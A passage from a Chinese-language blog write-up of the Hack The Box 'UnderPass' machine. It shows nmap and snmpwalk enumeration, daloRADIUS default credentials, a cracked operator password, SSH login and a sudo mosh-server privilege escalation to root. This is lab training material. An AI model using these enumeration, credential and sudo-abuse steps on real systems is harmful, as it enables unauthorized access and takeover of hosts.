class="hljs-title">RIPCK</span>=<span class="hljs-title">G</span>%<span class="hljs-title">RUCK</span>=<span class="hljs-title">EAE7</span>%<span class="hljs-title">RUD</span>=<span class="hljs-title">G</span>)<span class="hljs-title">IE</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DFI</span>=<span class="hljs-title">N</span>%<span class="hljs-title">T</span>=</span><br><span class="hljs-function"><span class="hljs-title">OS</span>:40%<span class="hljs-title">CD</span>=<span class="hljs-title">S</span>)</span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">Network</span> <span class="hljs-title">Distance</span>: 3 <span class="hljs-title">hops</span></span><br><span class="hljs-function"><span class="hljs-title">Service</span> <span class="hljs-title">Info</span>: <span class="hljs-title">OS</span>: <span class="hljs-title">Linux</span>; <span class="hljs-title">CPE</span>: <span class="hljs-title">cpe</span>:/<span class="hljs-title">o:linux</span>:<span class="hljs-title">linux_kernel</span></span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">TRACEROUTE</span> (<span class="hljs-title">using</span> <span class="hljs-title">port</span> 3389/<span class="hljs-title">tcp</span>)</span><br><span class="hljs-function"><span class="hljs-title">HOP</span> <span class="hljs-title">RTT</span>       <span class="hljs-title">ADDRESS</span></span><br><span class="hljs-function">1   0.27 <span class="hljs-title">ms</span>   172.30.144.1</span><br><span class="hljs-function">2   369.92 <span class="hljs-title">ms</span> 10.10.16.1</span><br><span class="hljs-function">3   370.15 <span class="hljs-title">ms</span> 10.10.11.48</span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">OS</span> <span class="hljs-title">and</span> <span class="hljs-title">Service</span> <span class="hljs-title">detection</span> <span class="hljs-title">performed</span>. <span class="hljs-title">Please</span> <span class="hljs-title">report</span> <span class="hljs-title">any</span> <span class="hljs-title">incorrect</span> <span class="hljs-title">results</span> <span class="hljs-title">at</span> <span class="hljs-title">https</span>://<span class="hljs-title">nmap.org</span>/<span class="hljs-title">submit</span>/ .</span><br><span class="hljs-function"><span class="hljs-title">Nmap</span> <span class="hljs-title">done</span>: 1 <span class="hljs-title">IP</span> <span class="hljs-title">address</span> (1 <span class="hljs-title">host</span> <span class="hljs-title">up</span>) <span class="hljs-title">scanned</span> <span class="hljs-title">in</span> 52.86 <span class="hljs-title">seconds</span></span><br></code></pre></td></tr></table></figure>

<p>开了 http 和 ssh</p>
<h3 id="80"><a href="#80" class="headerlink" title="80"></a>80</h3><p>访问 http 服务，什么都没有</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/9bf9e7ad7d96c4e2.png"></p>
<h3 id="UDP"><a href="#UDP" class="headerlink" title="UDP"></a>UDP</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs cmd">└─# nmap -sV -Pn -A -sU <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">11</span>.<span class="hljs-number">48</span><br>Starting Nmap <span class="hljs-number">7</span>.<span class="hljs-number">94</span>SVN ( https://nmap.org ) <span class="hljs-built_in">at</span> <span class="hljs-number">2025</span>-<span class="hljs-number">03</span>-<span class="hljs-number">12</span> <span class="hljs-number">18</span>:<span class="hljs-number">46</span> CST<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">11</span>.<span class="hljs-number">48</span><br>Host is up (<span class="hljs-number">0</span>.<span class="hljs-number">32</span>s latency).<br><span class="hljs-keyword">Not</span> shown: <span class="hljs-number">997</span> closed udp ports (port-unreach)<br>PORT     STATE         SERVICE VERSION<br><span class="hljs-number">161</span>/udp  open          snmp    SNMPv1 server; <span class="hljs-built_in">net</span>-snmp SNMPv3 server (public)<br>| snmp-info:<br>|   enterprise: <span class="hljs-built_in">net</span>-snmp<br>|   engineIDFormat: unknown<br>|   engineIDData: c7ad5c4856d1cf6600000000<br>|   snmpEngineBoots: <span class="hljs-number">31</span><br>|_  snmpEngineTime: <span class="hljs-number">17</span>h05m41s<br>| snmp-sysdescr: Linux underpass <span class="hljs-number">5</span>.<span class="hljs-number">15</span>.<span class="hljs-number">0</span>-<span class="hljs-number">126</span>-generic #<span class="hljs-number">136</span>-Ubuntu SMP Wed Nov <span class="hljs-number">6</span> <span class="hljs-number">10</span>:<span class="hljs-number">38</span>:<span class="hljs-number">22</span> UTC <span class="hljs-number">2024</span> x86_64<br>|_  System uptime: <span class="hljs-number">17</span>h05m41.<span class="hljs-number">35</span>s (<span class="hljs-number">6154135</span> timeticks)<br><span class="hljs-number">1812</span>/udp open|filtered radius<br><span class="hljs-number">1813</span>/udp open|filtered radacct<br><span class="hljs-function">Warning: <span class="hljs-title">OSScan</span> <span class="hljs-title">results</span> <span class="hljs-title">may</span> <span class="hljs-title">be</span> <span class="hljs-title">unreliable</span> <span class="hljs-title">because</span> <span class="hljs-title">we</span> <span class="hljs-title">could</span> <span class="hljs-title">not</span> <span class="hljs-title">find</span> <span class="hljs-title">at</span> <span class="hljs-title">least</span> 1 <span class="hljs-title">open</span> <span class="hljs-title">and</span> 1 <span class="hljs-title">closed</span> <span class="hljs-title">port</span></span><br><span class="hljs-function"><span class="hljs-title">Aggressive</span> <span class="hljs-title">OS</span> <span class="hljs-title">guesses</span>: <span class="hljs-title">Citrix</span> <span class="hljs-title">Access</span> <span class="hljs-title">Gateway</span> <span class="hljs-title">VPN</span> <span class="hljs-title">gateway</span> (95%), <span class="hljs-title">Linksys</span> <span class="hljs-title">WRT610Nv3</span> <span class="hljs-title">WAP</span> (95%), 3<span class="hljs-title">Com</span> <span class="hljs-title">OfficeConnect</span> 3<span class="hljs-title">CRWER100</span>-75 <span class="hljs-title">wireless</span> <span class="hljs-title">broadband</span> <span class="hljs-title">router</span> (94%), <span class="hljs-title">Adtran</span> 424<span class="hljs-title">RG</span> <span class="hljs-title">FTTH</span> <span class="hljs-title">gateway</span> (94%), <span class="hljs-title">Aerohive</span> <span class="hljs-title">HiveOS</span> 3.4 (94%), <span class="hljs-title">Aerohive</span> <span class="hljs-title">HiveOS</span> 5.1 (94%), <span class="hljs-title">Aerohive</span> <span class="hljs-title">HiveOS</span> 7.1 (94%), <span class="hljs-title">AirMagnet</span> <span class="hljs-title">SmartEdge</span> <span class="hljs-title">wireless</span> <span class="hljs-title">sensor</span>; <span class="hljs-title">or</span> <span class="hljs-title">Foscam</span> <span class="hljs-title">FI8904W</span>, <span class="hljs-title">FI8910W</span>, <span class="hljs-title">or</span> <span class="hljs-title">FI8918W</span>, <span class="hljs-title">or</span> <span class="hljs-title">Instar</span> <span class="hljs-title">IN</span>-3010 <span class="hljs-title">surveillance</span> <span class="hljs-title">camera</span> (<span class="hljs-title">Linux</span> 2.4) (94%), <span class="hljs-title">Alcatel</span>-<span class="hljs-title">Lucent</span> <span class="hljs-title">OmniPCX</span> <span class="hljs-title">GD3</span> <span class="hljs-title">PBX</span> (<span class="hljs-title">Linux</span> 2.6.23) (94%), <span class="hljs-title">Allnet</span> 2210 <span class="hljs-title">webcam</span>, <span class="hljs-title">Cisco</span> <span class="hljs-title">MDS</span> 9124 <span class="hljs-title">or</span> 9216<span class="hljs-title">i</span> <span class="hljs-title">switch</span> (<span class="hljs-title">SAN</span>-<span class="hljs-title">OS</span> 3.1 - 3.2), <span class="hljs-title">or</span> <span class="hljs-title">Nortel</span> <span class="hljs-title">IP</span> <span class="hljs-title">Phone</span> 1535 (94%)</span><br><span class="hljs-function"><span class="hljs-title">No</span> <span class="hljs-title">exact</span> <span class="hljs-title">OS</span> <span class="hljs-title">matches</span> <span class="hljs-title">for</span> <span class="hljs-title">host</span> (<span class="hljs-title">test</span> <span class="hljs-title">conditions</span> <span class="hljs-title">non</span>-<span class="hljs-title">ideal</span>).</span><br><span class="hljs-function"><span class="hljs-title">Network</span> <span class="hljs-title">Distance</span>: 3 <span class="hljs-title">hops</span></span><br><span class="hljs-function"><span class="hljs-title">Service</span> <span class="hljs-title">Info</span>: <span class="hljs-title">Host</span>: <span class="hljs-title">UnDerPass.htb</span> <span class="hljs-title">is</span> <span class="hljs-title">the</span> <span class="hljs-title">only</span> <span class="hljs-title">daloradius</span> <span class="hljs-title">server</span> <span class="hljs-title">in</span> <span class="hljs-title">the</span> <span class="hljs-title">basin</span>!</span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">TRACEROUTE</span> (<span class="hljs-title">using</span> <span class="hljs-title">port</span> 38063/<span class="hljs-title">udp</span>)</span><br><span class="hljs-function"><span class="hljs-title">HOP</span> <span class="hljs-title">RTT</span>       <span class="hljs-title">ADDRESS</span></span><br><span class="hljs-function">1   0.22 <span class="hljs-title">ms</span>   172.30.144.1</span><br><span class="hljs-function">2   373.85 <span class="hljs-title">ms</span> 10.10.16.1</span><br><span class="hljs-function">3   319.73 <span class="hljs-title">ms</span> 10.10.11.48</span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">OS</span> <span class="hljs-title">and</span> <span class="hljs-title">Service</span> <span class="hljs-title">detection</span> <span class="hljs-title">performed</span>. <span class="hljs-title">Please</span> <span class="hljs-title">report</span> <span class="hljs-title">any</span> <span class="hljs-title">incorrect</span> <span class="hljs-title">results</span> <span class="hljs-title">at</span> <span class="hljs-title">https</span>://<span class="hljs-title">nmap.org</span>/<span class="hljs-title">submit</span>/ .</span><br><span class="hljs-function"><span class="hljs-title">Nmap</span> <span class="hljs-title">done</span>: 1 <span class="hljs-title">IP</span> <span class="hljs-title">address</span> (1 <span class="hljs-title">host</span> <span class="hljs-title">up</span>) <span class="hljs-title">scanned</span> <span class="hljs-title">in</span> 1225.45 <span class="hljs-title">seconds</span></span><br></code></pre></td></tr></table></figure>

<p>161 端口有 <code>snmp</code> 服务</p>
<p>SNMP（简单网络管理协议），是一个应用层协议，为网络节点提供了一个通用的管理方法。更多详情：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/chegxy/p/14020233.html">https://www.cnblogs.com/chegxy/p/14020233.html</a></p>
<p>用 snmpwalk 打印出 IP 详细信息</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">snmpwalk</span> -v <span class="hljs-number">2</span>c -c public <span class="hljs-number">10.10.11.48</span><br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/8383c412e168bb97.png"></p>
<p>可以看到两条信息</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">iso</span>.<span class="hljs-number">3.6.1.2</span>.<span class="hljs-number">1.1.4.0</span> = STRING: <span class="hljs-string">&quot;steve@underpass.htb&quot;</span><br><span class="hljs-attribute">iso</span>.<span class="hljs-number">3.6.1.2</span>.<span class="hljs-number">1.1.5.0</span> = STRING: <span class="hljs-string">&quot;UnDerPass.htb is the only daloradius server in the basin!&quot;</span><br></code></pre></td></tr></table></figure>

<p>一条带有 htb 结尾的域名，另一条给出了 <code>daloradius</code> 服务器，<code>daloradius</code> 是一个 RADIUS Web 管理应用程序，用于管理热点和通用的 ISP 部署，</p>
<p>搜一下找到了 <a target="_blank" rel="noopener" href="https://github.com/lirantal/daloradius">daloRADIUS</a>，发现有 <code>login.php</code> 页面，访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://10.10.11.48/daloradius/app/users/login.php<br></code></pre></td></tr></table></figure>

<p>得到了一个登录框，并且在 <a target="_blank" rel="noopener" href="https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS">https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS</a> 找到了默认用户名和密码</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">Username:</span> administrator<br><span class="hljs-symbol">Password:</span> radius<br></code></pre></td></tr></table></figure>

<p>但是默认的登不进去，找到了另一个路径下的 <code>login.php</code> </p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">10.10</span>.<span class="hljs-number">11.48</span><span class="hljs-regexp">//</span>daloradius<span class="hljs-regexp">/app/</span>operators/login.php<br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/8feb7134cf1276bb.png"></p>
<p>找到了一个用户和密码</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/a27a171a6902fb13.png"></p>
<p>密码爆破出来</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/72c9eda786f794c5.png"></p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">underwaterfriends</span><br></code></pre></td></tr></table></figure>

<p>尝试 ssh 登录，能进去</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/5aa6f4d30ec762e8.png"></p>
<h2 id="Submit-root-flag"><a href="#Submit-root-flag" class="headerlink" title="Submit root flag"></a>Submit root flag</h2><p><code>sudo -l </code> 发现 <code>mosh-server</code> 能 <code>sudo</code></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs cmd"><span class="hljs-function">svcMosh@underpass:~$ <span class="hljs-title">sudo</span> -<span class="hljs-title">l</span></span><br><span class="hljs-function"><span class="hljs-title">Matching</span> <span class="hljs-title">Defaults</span> <span class="hljs-title">entries</span> <span class="hljs-title">for</span> <span class="hljs-title">svcMosh</span> <span class="hljs-title">on</span> <span class="hljs-title">localhost</span>:</span><br><span class="hljs-function">    <span class="hljs-title">env_reset</span>, <span class="hljs-title">mail_badpass</span>, <span class="hljs-title">secure_path</span>=/<span class="hljs-title">usr</span>/<span class="hljs-title">local</span>/<span class="hljs-title">sbin</span>\:/<span class="hljs-title">usr</span>/<span class="hljs-title">local</span>/<span class="hljs-title">bin</span>\:/<span class="hljs-title">usr</span>/<span class="hljs-title">sbin</span>\:/<span class="hljs-title">usr</span>/<span class="hljs-title">bin</span>\:/<span class="hljs-title">sbin</span>\:/<span class="hljs-title">bin</span>\:/<span class="hljs-title">snap</span>/<span class="hljs-title">bin</span>, <span class="hljs-title">use_pty</span></span><br><span class="hljs-function"></span><br><span class="hljs-function"><span class="hljs-title">User</span> <span class="hljs-title">svcMosh</span> <span class="hljs-title">may</span> <span class="hljs-title">run</span> <span class="hljs-title">the</span> <span class="hljs-title">following</span> <span class="hljs-title">commands</span> <span class="hljs-title">on</span> <span class="hljs-title">localhost</span>:</span><br><span class="hljs-function">    (<span class="hljs-title">ALL</span>) <span class="hljs-title">NOPASSWD</span>: /<span class="hljs-title">usr</span>/<span class="hljs-title">bin</span>/<span class="hljs-title">mosh</span>-<span class="hljs-title">server</span></span><br></code></pre></td></tr></table></figure>

<p>Mosh 表示 Mobile Shell，是一个从客户端跨互联网连接远程服务器的命令行工具，Mosh 最大特点就是 UDP 传输，所以传输快。</p>
<p>利用 Mosh 提权</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">mosh --server<span class="hljs-operator">=</span><span class="hljs-string">&quot;sudo /usr/bin/mosh-server&quot;</span> localhost<br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/d02a84fd82bca22c.png"></p>
<p>拿到 flag</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F/" class="category-chain-item">渗透</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%B8%97%E9%80%8F/%E9%9D%B6%E6%9C%BA/" class="category-chain-item">靶机</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%B8%97%E9%80%8F/%E9%9D%B6%E6%9C%BA/HTB/" class="category-chain-item">HTB</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/HTB-%E6%B8%97%E9%80%8F/" class="print-no-link">#HTB 渗透</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HTB-Cap &amp; UnderPass</div>
      <div>http://example.com/2025/03/12/HTB-Cap-UnderPass/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>butt3rf1y</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年3月12日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/03/12/Re-%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80/" title="汇编语言">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">汇编语言</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/03/09/Go-3/" title="Re:从零开始的 Go 之旅- 基础语法(3)">
                        <span class="hidden-mobile">Re:从零开始的 Go 之旅- 基础语法(3)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments">
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"rWKtzRd76Kz6dC7Vd9dUwQux-gzGzoHsz","appKey":"DxMgc7gveh6B1aJKyAZnoFNj","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span> </a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div style="font-size: 0.85rem"> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>







  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/snow.js%20/js/backgroundize.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<script type="text/javascript" src="\js\snow.js"></script>
<script type="text/javascript" src="\js\backgroundize.js"></script>

